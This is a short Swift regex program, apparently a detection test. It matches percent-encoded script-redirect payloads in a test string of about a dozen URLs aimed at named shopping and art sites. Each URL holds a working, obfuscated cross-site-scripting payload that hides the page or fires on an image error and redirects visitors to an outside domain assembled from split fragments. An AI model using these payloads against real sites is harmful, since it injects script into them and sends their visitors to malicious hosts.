import Foundation
let pattern = #"\S+?\S+%3E%3C%73%63%72%69%70%74%3E\S+%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66\S+%3C%2F%73%63%72%69%70%74%3E\S+"#
let regex = try! NSRegularExpression(pattern: pattern, options: .caseInsensitive)
let testString = ##"""
https://giclee.haddadsfinearts.com/search.php?lastname=mh463%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%69%6D%27%2C%27%70%75%74%27%2C%27%65%6C%65%27%2C%27%74%74%27%2C%27%65%72%27%2C%27%2E%63%27%2C%27%6F%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%38%36%27%2C%27%35%61%63%27%2C%27%61%31%27%2C%27%37%27%2C%27%36%63%27%2C%27%31%62%27%2C%27%30%34%27%2C%27%32%31%27%2C%27%39%27%2C%27%63%64%66%27%2C%27%39%27%2C%27%37%32%27%2C%27%62%35%27%2C%27%63%39%27%2C%27%37%39%27%2C%27%63%27%2C%27%63%31%2F9%2F299%2D12336%2F1255%2D11081%2D20489%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C %2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#hVd%3CU[11Os2fp}grr^-d
https://giclee.haddadsfinearts.com/search.php?lastname=3shla%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%69%6D%27%2C%27%70%75%74%27%2C%27%65%6C%65%27%2C%27%74%74%27%2C%27%65%72%27%2C%27%2E%63%27%2C%27%6F%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%39%31%27%2C%27%39%36%38%27%2C%27%30%27%2C%27%31%27%2C%27%30%31%27%2C%27%66%34%27%2C%27%66%34%27%2C%27%63%62%65%27%2C%27%62%30%38%27%2C%27%34%65%27%2C%27%38%63%32%27%2C%27%64%38%27%2C%27%61%34%27%2C%27%34%37%27%2C%27%33%34%2F11%2F300%2D12341%2F1254%2D7417%2D20502%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#FRv3,z+Gp+XlGJtN#2O8
https://giclee.haddadsfinearts.com/search.php?lastname=9hbvv%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%69%6D%27%2C%27%70%75%74%27%2C%27%65%6C%65%27%2C%27%74%74%27%2C%27%65%72%27%2C%27%2E%63%27%2C%27%6F%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%39%31%27%2C%27%39%36%38%27%2C%27%30%27%2C%27%31%27%2C%27%30%31%27%2C%27%66%34%27%2C%27%66%34%27%2C%27%63%62%65%27%2C%27%62%30%38%27%2C%27%34%65%27%2C%27%38%63%32%27%2C%27%64%38%27%2C%27%61%34%27%2C%27%34%37%27%2C%27%33%34%2F11%2F300%2D12342%2F1255%2D7632%2D20502%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#glj1}}M8:JPuAd^}P_9G
https://www.yamada-shoten.com/english/detail.php?item_id=5090312%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%63%6F%27%2C%27%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%27%2C%27%6B%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%64%27%2C%27%33%27%2C%27%33%37%27%2C%27%61%36%27%2C%27%35%36%27%2C%27%64%30%32%27%2C%27%61%32%27%2C%27%64%63%27%2C%27%63%31%32%27%2C%27%38%62%65%27%2C%27%32%33%32%27%2C%27%62%38%37%27%2C%27%38%32%65%27%2C%27%31%64%2F9%2F301%2D12527%2F1254%2D4208%2D18544%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#),zmj91/(kR^L+9+M(Nf
https://www.yamada-shoten.com/english/detail.php?item_id=4391044%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%63%6F%27%2C%27%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%27%2C%27%6B%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%64%27%2C%27%33%27%2C%27%33%37%27%2C%27%61%36%27%2C%27%35%36%27%2C%27%64%30%32%27%2C%27%61%32%27%2C%27%64%63%27%2C%27%63%31%32%27%2C%27%38%62%65%27%2C%27%32%33%32%27%2C%27%62%38%37%27%2C%27%38%32%65%27%2C%27%31%64%2F9%2F301%2D12527%2F1254%2D5482%2D18531%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#.$nwjZdk7w!d^b%3EDjH;0
https://www.yamada-shoten.com/english/detail.php?item_id=6811024%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%63%6F%27%2C%27%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%27%2C%27%6B%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%64%27%2C%27%33%27%2C%27%33%37%27%2C%27%61%36%27%2C%27%35%36%27%2C%27%64%30%32%27%2C%27%61%32%27%2C%27%64%63%27%2C%27%63%31%32%27%2C%27%38%62%65%27%2C%27%32%33%32%27%2C%27%62%38%37%27%2C%27%38%32%65%27%2C%27%31%64%2F9%2F301%2D12527%2F1254%2D10574%2D18566%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#ZuZ(wP;~P[vZm_}H-@+l
https://www.yamada-shoten.com/english/detail.php?item_id=4990871%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%63%6F%27%2C%27%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%27%2C%27%6B%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%64%27%2C%27%33%27%2C%27%33%37%27%2C%27%61%36%27%2C%27%35%36%27%2C%27%64%30%32%27%2C%27%61%32%27%2C%27%64%63%27%2C%27%63%31%32%27%2C%27%38%62%65%27%2C%27%32%33%32%27%2C%27%62%38%37%27%2C%27%38%32%65%27%2C%27%31%64%2F9%2F301%2D12527%2F1254%2D12309%2D18580%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#qHIFVJLm^pi*c;r{Jc_v
https://www.yamada-shoten.com/english/detail.php?item_id=4881083%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%27%2C%27%3A%2F%27%2C%27%2F%63%6F%27%2C%27%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%27%2C%27%6B%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%64%27%2C%27%33%27%2C%27%33%37%27%2C%27%61%36%27%2C%27%35%36%27%2C%27%64%30%32%27%2C%27%61%32%27%2C%27%64%63%27%2C%27%63%31%32%27%2C%27%38%62%65%27%2C%27%32%33%32%27%2C%27%62%38%37%27%2C%27%38%32%65%27%2C%27%31%64%2F9%2F301%2D12527%2F1255%2D3462%2D18557%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#rsYvMCFQ&o)46Q;Y*veI
https://www.epictura.es/search?keyword=548438249%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%3A%2F%2F%63%6F%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%6B%2E%63%6F%6D%2F%30%27%2C%27%2F%30%2F%30%2F%62%66%33%63%27%2C%27%34%63%36%61%33%27%2C%27%30%62%63%27%2C%27%64%36%31%38%33%27%2C%27%35%32%27%2C%27%32%31%31%63%27%2C%27%33%31%38%27%2C%27%38%64%64%66%27%2C%27%37%36/13/280-12552/1254-4943-21537%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E
https://www.epictura.es/search?keyword=606044690%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%73%3A%2F%2F%63%6F%6C%27%2C%27%6C%61%72%27%2C%27%62%6C%27%2C%27%69%6E%6B%2E%63%6F%6D%2F%30%27%2C%27%2F%30%2F%30%2F%62%66%33%63%27%2C%27%34%63%36%61%33%27%2C%27%30%62%63%27%2C%27%64%36%31%38%33%27%2C%27%35%32%27%2C%27%32%31%31%63%27%2C%27%33%31%38%27%2C%27%38%64%64%66%27%2C%27%37%36/13/280-12552/1254-7605-21539%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E
https://www.vivodiamonds.com/m/details.php?id=mijiecj%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%5B%27%68%27%2C%27%74%74%27%2C%27%70%73%27%2C%27%3A%2F%27%2C%27%2F%76%27%2C%27%61%75%27%2C%27%6C%74%27%2C%27%64%6F%72%65%27%2C%27%73%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%66%66%61%27%2C%27%64%38%61%27%2C%27%30%32%27%2C%27%32%39%27%2C%27%38%65%62%31%27%2C%27%32%33%35%34%63%27%2C%27%61%33%38%37%27%2C%27%62%27%2C%27%65%33%36%27%2C%27%62%32%36%30%65%27%2C%27%2F12%2F40%2D12606%2F1169%2D1668%2D21957%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%3C%2F%73%63%72%69%70%74%3E
https://www.vivodiamonds.com/m/details.php?id=ixtjmxl%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%5B%27%68%27%2C%27%74%74%27%2C%27%70%73%27%2C%27%3A%2F%27%2C%27%2F%76%27%2C%27%61%75%27%2C%27%6C%74%27%2C%27%64%6F%72%65%27%2C%27%73%2E%63%27%2C%27%6F%27%2C%27%6D%2F%27%2C%27%30%2F%30%27%2C%27%2F%30%2F%66%66%61%27%2C%27%64%38%61%27%2C%27%30%32%27%2C%27%32%39%27%2C%27%38%65%62%31%27%2C%27%32%33%35%34%63%27%2C%27%61%33%38%37%27%2C%27%62%27%2C%27%65%33%36%27%2C%27%62%32%36%30%65%27%2C%27%2F12%2F40%2D12606%2F1169%2D2119%2D21957%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%3C%2F%73%63%72%69%70%74%3E
"""##
let stringRange = NSRange(location: 0, length: testString.utf16.count)
let matches = regex.matches(in: testString, range: stringRange)
var result: [[String]] = []
for match in matches {
var groups: [String] = []
for rangeIndex in 1 ..< match.numberOfRanges {
let nsRange = match.range(at: rangeIndex)
guard !NSEqualRanges(nsRange, NSMakeRange(NSNotFound, 0)) else { continue }
let string = (testString as NSString).substring(with: nsRange)
groups.append(string)
}
if !groups.isEmpty {
result.append(groups)
}
}
print(result)